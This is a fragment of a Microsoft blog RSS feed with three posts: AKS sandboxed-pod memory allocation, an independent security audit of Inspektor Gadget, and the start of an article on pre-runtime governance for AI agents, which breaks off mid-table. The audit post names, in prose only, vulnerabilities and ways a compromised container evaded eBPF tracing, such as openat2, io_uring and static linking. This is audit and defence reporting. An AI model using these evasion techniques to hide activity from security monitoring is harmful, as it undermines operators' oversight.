&lt;P&gt;Before recent improvements in AKS Pod Sandboxing, large-memory pods could take over a minute longer to start than smaller ones. For customers running latency-sensitive, autoscaling, AI/ML, or bursty workloads, that startup delay directly impacted scale-out responsiveness, job completion time, and overall cluster efficiency.&lt;/P&gt;
&lt;P&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/aks/use-pod-sandboxing" target="_blank" rel="noopener"&gt;AKS Pod Sandboxing&lt;/A&gt; provides strong workload isolation by running pods inside lightweight virtual machines. This model is especially valuable for security-sensitive, untrusted, or multi-tenant workloads, but it came with a tradeoff: memory size directly impacted startup latency.&lt;/P&gt;
&lt;P&gt;With recent updates to the &lt;A class="lia-external-url" href="https://en.wikipedia.org/wiki/Azure_Linux" target="_blank" rel="noopener"&gt;Azure Linux&lt;/A&gt; kernel used by AKS on Microsoft Hypervisor (MSHV), AKS has significantly improved startup time for large-memory sandboxed pods. This article explains what changed, why it matters, and what AKS customers should expect in practice.&amp;nbsp;&lt;/P&gt;
&lt;H2&gt;The Problem: Large-Memory Pod Startup Was Expensive&amp;nbsp;&lt;/H2&gt;
&lt;P&gt;Before this change, &lt;A class="lia-external-url" href="https://katacontainers.io/" target="_blank" rel="noopener"&gt;Kata-based pod sandboxes&lt;/A&gt; on AKS using the Microsoft Hypervisor (MSHV) followed an &lt;EM&gt;eager memory allocation&lt;/EM&gt; model:&amp;nbsp;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;When a pod sandbox VM was created, all memory specified in the pod resource request was committed up front on the host.&amp;nbsp;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI&gt;For example: a pod requesting 32 GB, 64 GB, or 96 GB of memory forced the host to&amp;nbsp;allocate&amp;nbsp;and pin those virtual memory pages in physical memory before the VM could boot.&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;As a result, sandbox startup time scaled linearly with memory size.&amp;nbsp;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Measurements showed startup times growing quickly as memory increased:&amp;nbsp;&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Pod Sandbox Memory&amp;nbsp;&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;E2E Startup Time (Before)&amp;nbsp;&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;32 GB&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;~21 seconds&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;64 GB&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;~41 seconds&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;96 GB&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;~62 seconds&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;This led to:&amp;nbsp;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Slower startup and scale-out for memory-heavy workloads.&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;Inefficient node&amp;nbsp;utilization&amp;nbsp;due to wasted memory reserved but unused at startup.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;What Changed: Deferred Page Allocation in MSHV Host Kernel&amp;nbsp;&lt;/H2&gt;
&lt;P&gt;With deferred page allocation, the kernel no longer commits all virtual machine memory at sandbox creation time.&amp;nbsp;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;The pod sandbox VM boots with a small&amp;nbsp;initial&amp;nbsp;memory footprint.&amp;nbsp;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI&gt;Host memory pages are committed lazily, only when the guest faults them.&amp;nbsp;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI&gt;The total available memory remains bounded by the pod memory limit defined in the pod specification.&amp;nbsp;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This behavior aligns with how KVM-based systems handle guest memory today but is implemented for MSHV in Azure Linux.&amp;nbsp;&lt;/P&gt;
&lt;P&gt;In short: &lt;EM&gt;memory is provisioned on demand, not up front.&lt;BR /&gt;&lt;/EM&gt;&lt;/P&gt;
&lt;img&gt;Guest Memory Allocation (Before &amp;amp; After)&lt;/img&gt;
&lt;H2&gt;Results&amp;nbsp;&lt;/H2&gt;
&lt;H3&gt;1. Pod Startup Time Is Now Effectively Constant&amp;nbsp;&lt;/H3&gt;
&lt;P&gt;The most visible benefit for AKS customers is dramatically improved pod startup time for large-memory pods.&amp;nbsp;&lt;/P&gt;
&lt;P&gt;With deferred page allocation enabled, startup time becomes approximately&amp;nbsp;O(1) with respect to memory size:&amp;nbsp;&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Pod Sandbox Memory&amp;nbsp;&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;E2E Startup Time (After)&amp;nbsp;&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;32 GB&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;~3 seconds&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;64 GB&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;~3 seconds&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;96 GB&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;~3.5 seconds&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;UL&gt;
&lt;LI&gt;~7x faster startup for 32 GB pods&amp;nbsp;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI&gt;~12x faster startup for 64 GB pods&amp;nbsp;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI&gt;~17x faster startup for 96 GB pods&amp;nbsp;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;2. Higher Density and Better Memory Utilization&amp;nbsp;&lt;/H3&gt;
&lt;P&gt;Deferred page allocation also reduces wasted reserved memory at pod start. This allows AKS nodes to safely oversubscribe memory for cold pods, pack more sandboxed pods per node, and improve overall workload density and infrastructure efficiency.&amp;nbsp;&lt;/P&gt;
&lt;H4&gt;Tradeoff: First-Touch Page Fault Cost&amp;nbsp;&lt;/H4&gt;
&lt;P data-start="207" data-end="491"&gt;Deferred page allocation introduces a first-touch cost: when a workload accesses a memory page for the first time, a page fault triggers host allocation. This cost is incurred once per page. After memory is populated, steady-state performance matches eager allocation in benchmarks.&lt;/P&gt;
&lt;P data-start="498" data-end="637"&gt;For most workloads, especially those that ramp memory gradually or benefit from faster startup, the improvement outweighs this one-time cost.&lt;/P&gt;
&lt;H2&gt;What AKS Pod Sandboxing Customers Need To&amp;nbsp;Do&amp;nbsp;&lt;/H2&gt;
&lt;P&gt;Here's the &lt;EM&gt;good &lt;/EM&gt;part: &lt;STRONG&gt;No changes are required for workloads to benefit from this improvement&lt;/STRONG&gt;. However, customers are encouraged to:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Specify realistic memory requests and limits.&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;Take advantage of improved startup behavior for scale-out scenarios.&amp;nbsp;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;&lt;EM&gt;Deferred page allocation is available in AKS Pod Sandboxing on AKS Azure Linux version 202603.18.1 or later, running kernel-mshv 6.6.121 or newer.&lt;/EM&gt;&lt;/P&gt;</description>
      <pubDate>Thu, 14 May 2026 15:29:00 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/decoupling-memory-from-startup-time-in-aks-sandbox-pods/ba-p/4516307</guid>
      <dc:creator>RoaaSakr</dc:creator>
      <dc:date>2026-05-14T15:29:00Z</dc:date>
    </item>
    <item>
      <title>Inspektor Gadget Completes Its First Independent Security Audit</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/inspektor-gadget-completes-its-first-independent-security-audit/ba-p/4517895</link>
      <description>&lt;P data-line="4"&gt;One thing I've learned working with Open Source software over the years is that the projects you can trust most are the ones willing to let someone else test and review. That's what's recently happened with Inspektor Gadget, the open source&amp;nbsp;&lt;A href="https://ebpf.foundation/-based" target="_blank" rel="noopener" data-href="https://ebpf.foundation/-based"&gt;eBPF&lt;/A&gt;&amp;nbsp;tool for Kubernetes observability and Linux host inspection. Inspektor Gadget completed its first independent security audit, and the results tell a good story about the maturity of this CNCF project.&lt;/P&gt;
&lt;H2 data-line="6"&gt;What is Inspektor Gadget?&lt;/H2&gt;
&lt;P data-line="8"&gt;&lt;A href="https://github.com/inspektor-gadget/inspektor-gadget" target="_blank" rel="noopener" data-href="https://github.com/inspektor-gadget/inspektor-gadget"&gt;Inspektor Gadget&lt;/A&gt;&amp;nbsp;is a framework and toolkit that uses eBPF technology to collect and inspect data on Kubernetes clusters and Linux hosts. It manages the packaging, deployment, and execution of "gadgets," which are eBPF programs packaged as&amp;nbsp;&lt;A href="https://opencontainers.org/" target="_blank" rel="noopener" data-href="https://opencontainers.org/"&gt;OCI&lt;/A&gt;&amp;nbsp;images. OCI (the Open Container Initiative) is a Linux Foundation project that defines open industry standards for container image formats and runtimes, so the same image can be distributed and run across any compliant tool or registry. If you're running Kubernetes in production and need to understand what's happening inside your cluster, Inspektor Gadget gives you that visibility. Because eBPF programs are loaded into the kernel at runtime to observe syscalls, network activity, and file access safely, your applications keep running unchanged while you get the data you need.&lt;/P&gt;
&lt;P data-line="10"&gt;Microsoft engineers Francis Laniel and Mauricio Vasquez are core maintainers on the project, and Microsoft has been a steady contributor to this CNCF project for several years now.&lt;/P&gt;
&lt;H2 data-line="12"&gt;Why a security audit?&lt;/H2&gt;
&lt;P data-line="14"&gt;Any tool that runs with elevated privileges on your infrastructure needs to earn trust. Inspektor Gadget runs with root-level access on nodes to do its job, so an independent review of its security posture is the responsible thing to do. The Cloud Native Computing Foundation (CNCF) facilitated the engagement through the Open Source Technology Improvement Fund (OSTIF), a nonprofit dedicated to improving the security of open source software. Over the past ten years, OSTIF has managed security engagements that have uncovered more than 800 vulnerabilities across 120 open source projects.&lt;/P&gt;
&lt;P data-line="14"&gt;For Microsoft customers, that trust matters in a very practical way. Inspektor Gadget is incorporated into Microsoft Defender for Containers and AKS's Node Problem Detector, and it is also a common troubleshooting tool used by customers and support engineers when they need to understand what is happening inside a cluster. When a project sits this close to production infrastructure, an independent audit is more than a milestone for the maintainers. It gives customers, operators, and support teams a clearer view of the project's security posture and the fixes already available.&lt;/P&gt;
&lt;H2 data-line="16"&gt;Who did the audit?&lt;/H2&gt;
&lt;P data-line="18"&gt;OSTIF engaged Shielder, an Italian security firm, to perform the assessment, with two Shielder researchers working on the audit in early 2026. Their methodology combined collaborative threat modeling with the Inspektor Gadget maintainers, manual source code review, dynamic testing on dedicated lab environments, static analysis using tools like Semgrep and GoSec, and AI-assisted code review for broader coverage. They set up three separate test environments: a local Linux host deployment, a remote daemon deployment, and a Kubernetes deployment on minikube.&lt;/P&gt;
&lt;H2 data-line="20"&gt;What did they find?&lt;/H2&gt;
&lt;P data-line="22"&gt;The audit identified three vulnerabilities. None were rated Critical or High severity.&lt;/P&gt;
&lt;P data-line="24"&gt;&lt;STRONG&gt;Two Medium severity findings:&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL data-line="26"&gt;
&lt;LI data-line="26"&gt;&lt;STRONG&gt;Command Injection in ig image build&lt;/STRONG&gt;&amp;nbsp;(&lt;A href="https://github.com/inspektor-gadget/inspektor-gadget/security/advisories" target="_blank" rel="noopener" data-href="https://github.com/inspektor-gadget/inspektor-gadget/security/advisories"&gt;CVE-2026-24905&lt;/A&gt;): The image build process used Makefiles that embedded user-controlled input without proper escaping, creating a command injection vector. This would matter most in CI/CD scenarios building untrusted gadgets. Fixed in release v0.48.1.&lt;/LI&gt;
&lt;LI data-line="28"&gt;&lt;STRONG&gt;Denial of Service via Event Flooding&lt;/STRONG&gt;: A malicious container could flood the eBPF ring buffer (which was hard-coded to 256KB) causing the system to silently drop events from other containers. If you're using Inspektor Gadget for security monitoring, this could let an attacker hide their activity. Fixed in release v0.50.1.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P data-line="30"&gt;&lt;STRONG&gt;One Low severity finding:&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL data-line="32"&gt;
&lt;LI data-line="32"&gt;&lt;STRONG&gt;Unsanitized ANSI Escape Sequences in columns output mode&lt;/STRONG&gt;&amp;nbsp;(&lt;A href="https://github.com/inspektor-gadget/inspektor-gadget/security/advisories" target="_blank" rel="noopener" data-href="https://github.com/inspektor-gadget/inspektor-gadget/security/advisories"&gt;CVE-2026-25996&lt;/A&gt;): When displaying events in the terminal, Inspektor Gadget didn't sanitize ANSI escape sequences, which could allow a compromised container to inject terminal escape codes into the operator's display. Fixed in release v0.49.1.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P data-line="34"&gt;All three vulnerabilities now have patches available.&lt;/P&gt;
&lt;H2 data-line="36"&gt;Hardening recommendations&lt;/H2&gt;
&lt;P data-line="38"&gt;Beyond the specific vulnerabilities, Shielder provided six hardening recommendations. These are the kinds of findings that don't represent immediate exploits but point to areas where the project can reduce its attack surface over time:&lt;/P&gt;
&lt;UL data-line="40"&gt;
&lt;LI data-line="40"&gt;&lt;STRONG&gt;Enforce TLS by default on TCP listeners.&lt;/STRONG&gt;&amp;nbsp;When the daemon starts a TCP listener without TLS, it just logs a warning and continues in plaintext. The recommendation is to require an explicit opt-out flag instead.&lt;/LI&gt;
&lt;LI data-line="41"&gt;&lt;STRONG&gt;Pin and verify external dependencies in CI/CD.&lt;/STRONG&gt;&amp;nbsp;Several build dependencies were downloaded without hash or signature verification. The team has already landed fixes or has pull requests open for most of these.&lt;/LI&gt;
&lt;LI data-line="42"&gt;&lt;STRONG&gt;Implement a Kubernetes namespace blocklist&lt;/STRONG&gt;&amp;nbsp;to prevent unintended tracing on sensitive namespaces like kube-system.&lt;/LI&gt;
&lt;LI data-line="43"&gt;&lt;STRONG&gt;Restrict remote clients from enabling host-level tracing&lt;/STRONG&gt;&amp;nbsp;through the daemon, or at minimum document the risk.&lt;/LI&gt;
&lt;LI data-line="44"&gt;&lt;STRONG&gt;Automate third-party vulnerability scanning&lt;/STRONG&gt;&amp;nbsp;for project dependencies.&lt;/LI&gt;
&lt;LI data-line="45"&gt;&lt;STRONG&gt;Reduce RBAC permissions&lt;/STRONG&gt;&amp;nbsp;on the DaemonSet pod, specifically the nodes/proxy GET permission which could be leveraged for privilege escalation if the service account token is compromised.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-line="47"&gt;The Inspektor Gadget team is working through these systematically. Some are already addressed while others will take more time, particularly the RBAC work and the namespace blocklist implementation.&lt;/P&gt;
&lt;H2 data-line="49"&gt;Gadget bypass testing&lt;/H2&gt;
&lt;P data-line="51"&gt;One part of the audit I found particularly valuable was the gadget bypass testing. The researchers looked at whether a compromised container could perform operations that Inspektor Gadget is supposed to trace without triggering any events. They found six bypass scenarios, ranging from using newer Linux syscalls that certain gadgets don't hook (like openat2 instead of openat) to evasion through io_uring and statically linked libraries.&lt;/P&gt;
&lt;P data-line="53"&gt;These findings are characteristic of the cat-and-mouse nature of kernel-level tracing. As Linux evolves, the set of syscalls and mechanisms grows, and tracing tools need to keep up. The Inspektor Gadget team has already fixed some of these and is documenting the inherent limitations that come with the design of eBPF-based tracing.&lt;/P&gt;
&lt;H2 data-line="55"&gt;What this means&lt;/H2&gt;
&lt;P data-line="57"&gt;For organizations using Inspektor Gadget in production, the actionable step is to update to v0.50.1 or later, which includes fixes for all three reported vulnerabilities. Other than that, the Shielder team's own summary states that "the overall security posture of Inspektor Gadget is adequately mature from both a secure coding and design point of view."&lt;/P&gt;
&lt;P data-line="59"&gt;For the open source community, this audit is an example of how the CNCF ecosystem works at its best. A project reaches a level of adoption where independent security review becomes necessary, OSTIF and CNCF coordinate the engagement, qualified researchers do the work, maintainers fix the issues, and everything gets published so users can make informed decisions. That's the open source process working as it should.&lt;/P&gt;
&lt;H2 data-line="61"&gt;Resources&lt;/H2&gt;
&lt;UL data-line="63"&gt;
&lt;LI data-line="63"&gt;&lt;A href="https://github.com/inspektor-gadget/inspektor-gadget" target="_blank" rel="noopener" data-href="https://github.com/inspektor-gadget/inspektor-gadget"&gt;Inspektor Gadget on GitHub&lt;/A&gt;&lt;/LI&gt;
&lt;LI data-line="64"&gt;&lt;A href="https://github.com/inspektor-gadget/inspektor-gadget/releases/tag/v0.50.1" target="_blank" rel="noopener" data-href="https://github.com/inspektor-gadget/inspektor-gadget/releases/tag/v0.50.1"&gt;Inspektor Gadget release v0.50.1&lt;/A&gt;&lt;/LI&gt;
&lt;LI data-line="65"&gt;&lt;A href="https://ostif.org/" target="_blank" rel="noopener" data-href="https://ostif.org"&gt;OSTIF (Open Source Technology Improvement Fund)&lt;/A&gt;&lt;/LI&gt;
&lt;LI data-line="66"&gt;&lt;A href="https://www.shielder.com/" target="_blank" rel="noopener" data-href="https://www.shielder.com/"&gt;Shielder&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-line="68"&gt;Audit announcement and resources&lt;/H2&gt;
&lt;UL data-line="70"&gt;
&lt;LI data-line="70"&gt;&lt;A href="https://github.com/ShielderSec/public-reports/blob/main/2026/%5BOSTIF%5D%20Inspektor%20Gadget%20-%20Report%20v1.2.pdf" target="_blank" rel="noopener" data-href="https://github.com/ShielderSec/public-reports/blob/main/2026/%5BOSTIF%5D%20Inspektor%20Gadget%20-%20Report%20v1.2.pdf"&gt;Full Report - Downloadable PDF&lt;/A&gt;&lt;/LI&gt;
&lt;LI data-line="71"&gt;&lt;A href="https://inspektor-gadget.io/blog/2026/04/inspektor-gadget-security-audit" target="_blank" rel="noopener" data-href="https://inspektor-gadget.io/blog/2026/04/inspektor-gadget-security-audit"&gt;Blog post - Inspektor Gadget&lt;/A&gt;&lt;/LI&gt;
&lt;LI data-line="72"&gt;&lt;A href="https://ostif.org/inspektor-gadget-audit-complete/" target="_blank" rel="noopener" data-href="https://ostif.org/inspektor-gadget-audit-complete/"&gt;Blog post - OSTIF&lt;/A&gt;&lt;/LI&gt;
&lt;LI data-line="73"&gt;&lt;A href="https://www.shielder.com/blog/2026/04/inspektor-gadget-security-audit/" target="_blank" rel="noopener" data-href="https://www.shielder.com/blog/2026/04/inspektor-gadget-security-audit/"&gt;Blog post - Shielder&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-line="75"&gt;CVEs&lt;/H2&gt;
&lt;UL data-line="77"&gt;
&lt;LI data-line="77"&gt;&lt;A href="https://github.com/inspektor-gadget/inspektor-gadget/security/advisories" target="_blank" rel="noopener" data-href="https://github.com/inspektor-gadget/inspektor-gadget/security/advisories"&gt;CVE-2026-24905: Command Injection in ig image build&lt;/A&gt;&lt;/LI&gt;
&lt;LI data-line="78"&gt;&lt;A href="https://github.com/inspektor-gadget/inspektor-gadget/security/advisories" target="_blank" rel="noopener" data-href="https://github.com/inspektor-gadget/inspektor-gadget/security/advisories"&gt;CVE-2026-25996: Unsanitized ANSI Escape Sequences&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;</description>
      <pubDate>Wed, 27 May 2026 19:04:24 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/inspektor-gadget-completes-its-first-independent-security-audit/ba-p/4517895</guid>
      <dc:creator>Brian Benz</dc:creator>
      <dc:date>2026-05-27T19:04:24Z</dc:date>
    </item>
    <item>
      <title>Shift-Left Governance for AI Agents: How the Agent Governance Toolkit Helps You Catch Violations</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/shift-left-governance-for-ai-agents-how-the-agent-governance/ba-p/4516481</link>
      <description>&lt;P&gt;In &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/linuxandopensourceblog/agent-governance-toolkit-architecture-deep-dive-policy-engines-trust-and-sre-for/4510105" data-lia-auto-title="part one of this series" data-lia-auto-title-active="0" target="_blank"&gt;part one of this series&lt;/A&gt;, we covered AGT’s runtime governance: the policy engine, zero-trust identity, execution sandboxing, and the OWASP Agentic AI risk mapping.&lt;/P&gt;
&lt;P&gt;That post focused on what happens when an agent &lt;STRONG&gt;acts&lt;/STRONG&gt;: policy evaluation at the moment a tool call fires, trust scoring when agents communicate, audit logging when decisions are made. Runtime governance is essential. But it is the last line of defense.&lt;/P&gt;
&lt;P&gt;After that post went live, a pattern emerged in conversations with teams adopting AGT. The same question kept coming up: runtime checks are useful, &lt;STRONG&gt;but what about everything before production&lt;/STRONG&gt;? We realized runtime governance was only half the story. So we went back and built tooling for every stage of your software development lifecycle, from the moment a developer saves a file to the moment an artifact ships to users.&lt;/P&gt;
&lt;H1&gt;Why Runtime Governance Is Not Enough&lt;/H1&gt;
&lt;P&gt;AI agents are a new class of workload. They reason about what to do, select tools, call APIs, read databases, and spawn sub-processes, often in loops that run without direct human oversight. The &lt;A class="lia-external-url" href="https://aka.ms/agt-owasp" target="_blank"&gt;OWASP Agentic AI Top 10&lt;/A&gt; (published December 2025) identifies risks like excessive agency, insecure tool use, privilege escalation, and supply chain compromise. These risks span the entire lifecycle, not just runtime.&lt;/P&gt;
&lt;P&gt;Consider a few scenarios that runtime governance alone cannot prevent:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;A developer commits a policy YAML file with a typo that silently disables all deny rules. The agent runs unprotected until someone notices.&lt;/LI&gt;
&lt;LI&gt;A dependency update introduces a package with a known critical CVE. The agent starts using a vulnerable library before any security team reviews it.&lt;/LI&gt;
&lt;LI&gt;A contributor adds a raw cryptographic import to an application module, bypassing the security-audited signing library. The code compiles and ships.&lt;/LI&gt;
&lt;LI&gt;A GitHub Actions workflow uses an expression injection pattern that allows an attacker to execute arbitrary code in CI.&lt;/LI&gt;
&lt;LI&gt;A release ships without a Software Bill of Materials (SBOM), making it impossible to trace which components are affected when the next log4j-style vulnerability drops.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Each of these is a governance failure, but none of them happens at runtime. &lt;STRONG&gt;They happen at commit time, at PR review time, at build time, or at release time&lt;/STRONG&gt;. A comprehensive governance strategy needs coverage at every stage.&lt;/P&gt;
&lt;H1&gt;Four Stages of Pre-Runtime Governance&lt;/H1&gt;
&lt;P&gt;Governance violations can enter a codebase at four distinct stages of the development lifecycle. Each stage has a different class of risk, and each needs a different kind of check:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="width: 99.1667%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Stage&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;When It Runs&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;What It Catches&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;AGT Tooling&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Commit-time&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Before code leaves the developer machine&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Malformed policies, schema violations, secrets, stub code, unauthorized crypto&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Pre-commit hooks, quality gates&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;PR-time&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;When a pull request is opened or updated&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Vulnerable dependencies, missing attestation, secrets in history, unpinned versions&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;GitHub Actions (attestation, dependency review, secret scanning, supply chain checks)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;CI/Build-time&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;On every push and pull request to main&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Compliance violations, binary security issues, dependency confusion, workflow injection&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Governance Verify action, Security Scan action, CodeQL, BinSkim, policy validation&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Release-time&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Before artifacts are published&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Missing provenance, unsigned artifacts, incomplete SBOMs&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;SBOM generation, Sigstore signing, build attestation, OpenSSF Scorecard&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;Just as with bugs, the earlier you catch a governance violation, the cheaper it is to fix. A malformed policy file caught at commit time costs zero CI minutes. A secret caught in PR review never reaches the default branch. A dependency confusion attack blocked in CI never reaches production. An unsigned artifact blocked at release time never reaches users.&lt;/P&gt;
&lt;H1&gt;Stage 1: Commit-Time Governance with Pre-Commit Hooks&lt;/H1&gt;
&lt;P&gt;The fastest governance feedback loop is local. Within the AGT project, we’ve implemented three pre-commit hooks that run automatically whenever a developer stages files for commit, validating governance artifacts before they ever leave the developer's machine.&lt;/P&gt;
&lt;H2&gt;Built-In Hooks&lt;/H2&gt;
&lt;P&gt;The toolkit's &lt;EM&gt;&lt;STRONG&gt;.pre-commit-hooks.yaml &lt;/STRONG&gt;&lt;/EM&gt;defines three hooks that any repository can adopt:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="width: 97.3148%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Hook ID&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;What It Validates&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;File Pattern&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;validate-policy&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;YAML/JSON policy files against the AGT policy schema, checking for required fields, valid operators, and structural correctness&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Files matching *polic*.yaml, *polic*.yml, *polic*.json&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;validate-plugin-manifest&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Plugin manifest files for required fields and schema compliance&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Files matching plugin.json, plugin.yaml, plugin.yml&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;evaluate-plugin-policy&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Plugin manifests against a governance policy file, evaluating whether the plugin would be allowed under the organization's rules&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
